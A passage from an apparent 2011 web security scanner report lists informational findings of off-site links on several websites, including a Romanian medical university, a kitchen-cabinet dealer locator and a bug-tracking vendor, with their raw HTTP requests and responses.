               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.52. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://umfcluj.ro/lista.aspx?t=Doctorat-Prezentare

The response contains the following links to other domains:

http://depcd.umfcluj.ro/public/index.php
http://forum.redbyte.ro/
http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg
http://www.netlogiq.ro/
http://www.umfcluj.ro/Detaliu.aspx?t=Doctorat-Date-de-contact
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0
http://www.umfcluj.ro/lista.aspx?t=DoctoratBiroudeConsiliereCariera
http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul

Request

GET /lista.aspx?t=Doctorat-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.4.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:14 GMT
Content-Length: 84035

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://forum.redbyte.ro/">Forum</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0'">Revista Studentilor</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutori</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">Descarca</a>
...[SNIP]...
<li class=""><a class="" href="http://depcd.umfcluj.ro/public/index.php" onclick="document.location.href='http://depcd.umfcluj.ro/public/index.php'">Departament Cercetare-Dezvoltare </a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0'">Revista Studentilor</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutori</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">Descarca</a>
...[SNIP]...
<li class=""><a class="" href="http://depcd.umfcluj.ro/public/index.php" onclick="document.location.href='http://depcd.umfcluj.ro/public/index.php'">Departament Cercetare-Dezvoltare </a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://forum.redbyte.ro/">Forum</a>
...[SNIP]...
<br />
<a href="http://www.umfcluj.ro/Detaliu.aspx?t=Doctorat-Date-de-contact">Mai multe detalii</a>
...[SNIP]...
</ul>
<a href="http://www.umfcluj.ro/lista.aspx?t=DoctoratBiroudeConsiliereCariera">Mai multe detalii...</a>
...[SNIP]...
<div id="webDesign">
<a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.53. http://umfcluj.ro/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/search.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://umfcluj.ro/search.aspx?caut=xss

The response contains the following links to other domains:

http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg
http://www.google.com/jsapi?key=ABQIAAAANZwfykwsHCjNL4gERaktPBSzWx17LJe0SsmJ8gqY9WfjG1R9hxTT4yq5qGTyi8mF0sc7JhLg1pVJGA
http://www.netlogiq.ro/
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&eID=289&c=0&m=0&y=0
http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti
http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:33 GMT
Content-Length: 35912

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" href="/css/search.css" />
<script src="http://www.google.com/jsapi?key=ABQIAAAANZwfykwsHCjNL4gERaktPBSzWx17LJe0SsmJ8gqY9WfjG1R9hxTT4yq5qGTyi8mF0sc7JhLg1pVJGA" type="text/javascript"></script>
...[SNIP]...
<li class="active"><a class="active" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class="active"><a class="active" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class="active"><a class="active" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<div id="alteInfo">

                                       <a href="http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&eID=289&c=0&m=0&y=0"><img height="120" width="190" alt="" src="/Images/FCK/image/poza_laterala_admitere-eng_fr.png" /></a><a href="http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti"><img height="120" width="190" alt="" src="/Images/FCK/image/poze-laterale-organizatii-en-fr.png" />
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.54. http://waypointlivingspaces.com/locate-dealer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://waypointlivingspaces.com
Path:	/locate-dealer

Issue detail

The page was loaded from a URL containing a query string:

http://waypointlivingspaces.com/locate-dealer?zip=10010

The response contains the following links to other domains:

http://maps.google.com/maps?saddr=&daddr=1+Tree+Farm+Road+Pennington+NJ%2C+08534
http://maps.google.com/maps?saddr=&daddr=10+Industrial+Drive+New+Brunswick+NJ%2C+08901
http://maps.google.com/maps?saddr=&daddr=108+Montauk+Hwy+Moriches+NY%2C+11955
http://maps.google.com/maps?saddr=&daddr=110+Route+46+East+Saddle+Brook+NJ%2C+07663
http://maps.google.com/maps?saddr=&daddr=137+Columbia+Turnpike+Florham+Park+NJ%2C+07932
http://maps.google.com/maps?saddr=&daddr=145+W.+Ward+Street+Hightstown+NJ%2C+08520
http://maps.google.com/maps?saddr=&daddr=1456+Middle+Country+Rd+Centereach+NY%2C+11720
http://maps.google.com/maps?saddr=&daddr=15-30+131st+St+College+Point+NY%2C+11356
http://maps.google.com/maps?saddr=&daddr=1621+Lakeland+Ave+Bohemia+NY%2C+11716
http://maps.google.com/maps?saddr=&daddr=166+Main+Street+Passaic+NJ%2C+07055
http://maps.google.com/maps?saddr=&daddr=1745+Route+10+East+Morris+Plains+NJ%2C+07950
http://maps.google.com/maps?saddr=&daddr=1747+Hempstead+Turnpike+Elmont+NY%2C+11003
http://maps.google.com/maps?saddr=&daddr=1900+Central+Park+Ave+Yonkers+NY%2C+10710
http://maps.google.com/maps?saddr=&daddr=211-36+Hillside+Ave+Queens+Village+NY%2C+11427
http://maps.google.com/maps?saddr=&daddr=216+Ryers+Ave+Cheltenham+PA%2C+19012
http://maps.google.com/maps?saddr=&daddr=2230+Clements+Ave+Pennington+NJ%2C+08534
http://maps.google.com/maps?saddr=&daddr=2333+Hylan+Blvd+Staten+Island+NY%2C+10305
http://maps.google.com/maps?saddr=&daddr=249+W+Main+St+Bay+Shore+NY%2C+11706
http://maps.google.com/maps?saddr=&daddr=250+E+Jericho+Tpke+Huntington+Station+NY%2C+11746
http://maps.google.com/maps?saddr=&daddr=3+Chestnut+Street+Spring+Valley+NY%2C+10977
http://maps.google.com/maps?saddr=&daddr=30+Broad+Way+Massapequa+NY%2C+11758
http://maps.google.com/maps?saddr=&daddr=311+South+Main+Street+Flemington+NJ%2C+08822
http://maps.google.com/maps?saddr=&daddr=3521+Victory+Blvd+Staten+Island+NY%2C+10314
http://maps.google.com/maps?saddr=&daddr=3950+Long+Beach+Rd+Island+Park+NY%2C+11558
http://maps.google.com/maps?saddr=&daddr=53+Commack+Rd+Commack+NY%2C+11725
http://maps.google.com/maps?saddr=&daddr=725+Route+25A+STE+12+Miller+Place+NY%2C+11764
http://maps.google.com/maps?saddr=&daddr=7307+Main+St+Flushing+NY%2C+11367
http://maps.google.com/maps?saddr=&daddr=7419+13th+Ave+Brooklyn+NY%2C+11228
http://maps.google.com/maps?saddr=&daddr=741B+West+Jericho+Turnpike+Huntington+NY%2C+11743
http://maps.google.com/maps?saddr=&daddr=94+Denton+Ave+Garden+City+Park+NY%2C+11040
http://maps.google.com/maps?saddr=&daddr=94-37+Rockaway+Blvd+Ozone+Park+NY%2C+11417
http://view.atdmt.com/iaction/pvmway_1456
http://www.aaronco.com/
http://www.beckerlelumber.com/
http://www.bhhomeexpo.com/
http://www.builtritecc.com/
http://www.centrecabinet.net/
http://www.completekitchenandbathdesign.com/
http://www.cottonekitchens.com/
http://www.cranburydesigncenter.com/
http://www.dentonstoneworks.com/
http://www.emescabinets.com/
http://www.ironwoodcd.com/
http://www.islandwidekitchens.com/
http://www.kabinetking.com/
http://www.kitchensbypaul.com/
http://www.kpsearch.com/df/customconcepts/all.asp
http://www.milanogranite.net/
http://www.mjsdesignsunlimited.net/
http://www.nyckd.com/
http://www.plumberry.net/
http://www.sskdinc.com/
http://www.thecabinetfactory.com/
http://www.theresemarcels.com/
http://www.wolfsingerdesign.com/

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:49:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<br /><a href='http://www.builtritecc.com' title='Visit this dealer online'>http://www.builtritecc.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=15-30+131st+St+College+Point+NY%2C+11356'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.thecabinetfactory.com' title='Visit this dealer online'>http://www.thecabinetfactory.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=7419+13th+Ave+Brooklyn+NY%2C+11228'>Get directions</a>
...[SNIP]...
<br /><a href='http://maps.google.com/maps?saddr=&daddr=94-37+Rockaway+Blvd+Ozone+Park+NY%2C+11417'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.bhhomeexpo.com' title='Visit this dealer online'>http://www.bhhomeexpo.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=7307+Main+St+Flushing+NY%2C+11367'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.emescabinets.com/' title='Visit this dealer online'>http://www.emescabinets.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=166+Main+Street+Passaic+NJ%2C+07055'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.kabinetking.com/' title='Visit this dealer online'>http://www.kabinetking.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=211-36+Hillside+Ave+Queens+Village+NY%2C+11427'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.kitchensbypaul.com/' title='Visit this dealer online'>http://www.kitchensbypaul.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=110+Route+46+East+Saddle+Brook+NJ%2C+07663'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.thecabinetfactory.com' title='Visit this dealer online'>http://www.thecabinetfactory.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=2333+Hylan+Blvd+Staten+Island+NY%2C+10305'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.milanogranite.net' title='Visit this dealer online'>http://www.milanogranite.net</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=3521+Victory+Blvd+Staten+Island+NY%2C+10314'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.kabinetking.com/' title='Visit this dealer online'>http://www.kabinetking.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=1747+Hempstead+Turnpike+Elmont+NY%2C+11003'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.dentonstoneworks.com/' title='Visit this dealer online'>http://www.dentonstoneworks.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=94+Denton+Ave+Garden+City+Park+NY%2C+11040'>Get directions</a>
...[SNIP]...
<br /><a href='http://maps.google.com/maps?saddr=&daddr=1900+Central+Park+Ave+Yonkers+NY%2C+10710'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.centrecabinet.net/' title='Visit this dealer online'>http://www.centrecabinet.net/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=3950+Long+Beach+Rd+Island+Park+NY%2C+11558'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.plumberry.net/' title='Visit this dealer online'>http://www.plumberry.net/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=137+Columbia+Turnpike+Florham+Park+NJ%2C+07932'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.beckerlelumber.com/' title='Visit this dealer online'>http://www.beckerlelumber.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=3+Chestnut+Street+Spring+Valley+NY%2C+10977'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.wolfsingerdesign.com/' title='Visit this dealer online'>http://www.wolfsingerdesign.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=1745+Route+10+East+Morris+Plains+NJ%2C+07950'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.nyckd.com' title='Visit this dealer online'>http://www.nyckd.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=30+Broad+Way+Massapequa+NY%2C+11758'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.kpsearch.com/df/customconcepts/all.asp' title='Visit this dealer online'>http://www.kpsearch.com/df/customconcepts/all.asp</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=741B+West+Jericho+Turnpike+Huntington+NY%2C+11743'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.islandwidekitchens.com/' title='Visit this dealer online'>http://www.islandwidekitchens.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=250+E+Jericho+Tpke+Huntington+Station+NY%2C+11746'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.aaronco.com' title='Visit this dealer online'>http://www.aaronco.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=10+Industrial+Drive+New+Brunswick+NJ%2C+08901'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.completekitchenandbathdesign.com/' title='Visit this dealer online'>http://www.completekitchenandbathdesign.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=53+Commack+Rd+Commack+NY%2C+11725'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.cottonekitchens.com' title='Visit this dealer online'>http://www.cottonekitchens.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=249+W+Main+St+Bay+Shore+NY%2C+11706'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.cranburydesigncenter.com/' title='Visit this dealer online'>http://www.cranburydesigncenter.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=145+W.+Ward+Street+Hightstown+NJ%2C+08520'>Get directions</a>
...[SNIP]...
<br /><a href='http://maps.google.com/maps?saddr=&daddr=1621+Lakeland+Ave+Bohemia+NY%2C+11716'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.theresemarcels.com/' title='Visit this dealer online'>http://www.theresemarcels.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=1456+Middle+Country+Rd+Centereach+NY%2C+11720'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.aaronco.com' title='Visit this dealer online'>http://www.aaronco.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=311+South+Main+Street+Flemington+NJ%2C+08822'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.ironwoodcd.com' title='Visit this dealer online'>http://www.ironwoodcd.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=2230+Clements+Ave+Pennington+NJ%2C+08534'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.ironwoodcd.com' title='Visit this dealer online'>http://www.ironwoodcd.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=1+Tree+Farm+Road+Pennington+NJ%2C+08534'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.mjsdesignsunlimited.net/' title='Visit this dealer online'>http://www.mjsdesignsunlimited.net/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=725+Route+25A+STE+12+Miller+Place+NY%2C+11764'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.sskdinc.com/' title='Visit this dealer online'>http://www.sskdinc.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=108+Montauk+Hwy+Moriches+NY%2C+11955'>Get directions</a>
...[SNIP]...
<br /><a href='http://maps.google.com/maps?saddr=&daddr=216+Ryers+Ave+Cheltenham+PA%2C+19012'>Get directions</a>
...[SNIP]...
<noscript><iframe src="http://view.atdmt.com/iaction/pvmway_1456" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

20.55. http://www.adminitrack.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adminitrack.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.adminitrack.com/?gclid=COjL1IrNjaoCFQ495QodxUaNzg

The response contains the following links to other domains:

http://export.gov/safeharbor
http://verify.authorize.net/anetseal/seal.js
http://www.authorize.net/
https://seal.verisign.com/getseal?host_name=www.adminitrack.com&size=S&use_flash=NO&use_transparent=YES&lang=en
https://www.export.gov/safehrbr/list.aspx

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 19 Jul 2011 14:20:31 GMT
Content-Length: 28976
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: AT=VISITOR=Y; expires=Wed, 18-Jul-2012 14:20:31 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
<div id="verisign">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.adminitrack.com&size=S&use_flash=NO&use_transparent=YES&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="//VERIFY.AUTHORIZE.NET/anetseal/seal.js"></script><br />
<a href="http://www.authorize.net/" id="AuthorizeNetText" target="_blank">Credit Card Processing</a>
...[SNIP]...
<hr /> -->
<a href="https://www.export.gov/safehrbr/list.aspx" target="_blank">We self-certify compliance with</a><br />

<a href="http://export.gov/safeharbor" id="safeharbor" target="_blank"><img src="images/safe_harbor_logo.gif" id="ctl00_ContentPlaceHolder1_RightBar1_safeharborlogo" align="middle" width="145" height="70" border="0" alt="Safe Harbor" />
...[SNIP]...

20.56. http://www.axosoft.com/lp/ga/bug-tracking-software/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.axosoft.com
Path:	/lp/ga/bug-tracking-software/

Issue detail

The page was loaded from a URL containing a query string:

http://www.axosoft.com/lp/ga/bug-tracking-software/?gclid=CNO474vNjaoCFYeD5QodMEA10A

The response contains the following links to other domains:

http://privacy-policy.truste.com/click-to-verify/www.axosoft.com
http://privacy-policy.truste.com/verified-policy/www.axosoft.com
http://privacy-policy.truste.com/verified-seal/www.axosoft.com/green/v.png
http://t2.trackalyzer.com/trackalyze.js
http://www.facebook.com/AxosoftOnTime
http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en
http://www.google.com/jsapi
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1072425968/?label=SBEcCIrZgQIQ8Nev_wM&guid=ON&script=0
http://www.twitter.com/axosoft
http://www.youtube.com/user/axosoft

Request

GET /lp/ga/bug-tracking-software/?gclid=CNO474vNjaoCFYeD5QodMEA10A HTTP/1.1
Host: www.axosoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gd4ro2453nos1b55a10z0q3f; _jsuid=2794942522048503467; is_returning=1; __utma=37276784.862101086.1311078323.1311078323.1311085183.2; __utmb=37276784.2.10.1311085183; __utmc=37276784; __utmz=37276784.1311078323.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=y78z346lekhphix3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script type="text/
...[SNIP]...
</form>
       <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
<div style="float:right; margin-top: 15px">
       <a href="http://www.twitter.com/axosoft" target="_blank"><img src="/images/General/icon_twitter_30x30.png" alt="Follow Axosoft on Twitter" width="30" height="30" style="vertical-align:bottom; padding:5px;" /></a>
           <a href="http://www.youtube.com/user/axosoft" target="_blank"><img src="/images/General/icon_youtube_30x30.png" alt="YouTube Axosoft" style="vertical-align: bottom; padding:5px;" /></a>
           <a href="http://www.facebook.com/AxosoftOnTime" target="_blank"><img src="/images/General/icon_facebook_30x30.png" alt="Become a Fan on Facebook!" style="vertical-align: bottom; padding:5px;" />
...[SNIP]...
<center> .. Copyright 2002 - 2011 Axosoft LLC | All Rights Reserved | <a href="http://privacy-policy.truste.com/verified-policy/www.axosoft.com" target="_blank" style="color:#000000">Privacy Policy </a><a href="//privacy-policy.truste.com/click-to-verify/www.axosoft.com" target="_blank"><img src="http://privacy-policy.truste.com/verified-seal/www.axosoft.com/green/v.png" alt="Privacy-Policy-By-TRUSTe" width="65" height="78" style="border: none; vertical-align: middle; margin-left: 10px; margin-top: 0px; margin-bottom: 0px"/></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1072425968/?label=SBEcCIrZgQIQ8Nev_wM&guid=ON&script=0"/>
</div>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.57. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boston.com
Path:	/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links

The response contains the following links to other domains:

http://add.my.yahoo.com/rss?url=http://syndication.boston.com/business/ticker/index.xml
http://bostonglobe.com/aboutus/contact_us/default.aspx
http://bostonglobe.com/advertiser/default.aspx
http://bostonglobe.com/subscribers/custserv.aspx?id=5274
http://bostonglobe.com/subscribers/extras/index.aspx
http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278
http://jobsearch.boston.monster.com/jobs/boston-globe-media+boston-globe+boston__2ecom_666?where=Boston__2C-MA&rad=10&sort=rv.dt&cy=us
http://nytbglobe.112.2o7.net/b/ss/nytbglobe/1/H.19.3--NS/0
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-604060h&cg=0&cc=1&ts=noscript
http://w.sharethis.com/button/sharethis.js
http://www.bostonglobe.com/advertiser/online/online.aspx?id=13052
http://www.doriancolor.com/page3.html
http://www.facebook.com/plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&layout=standard&show_faces=false&width=190&font=arial&colorscheme=light&ref=blogent
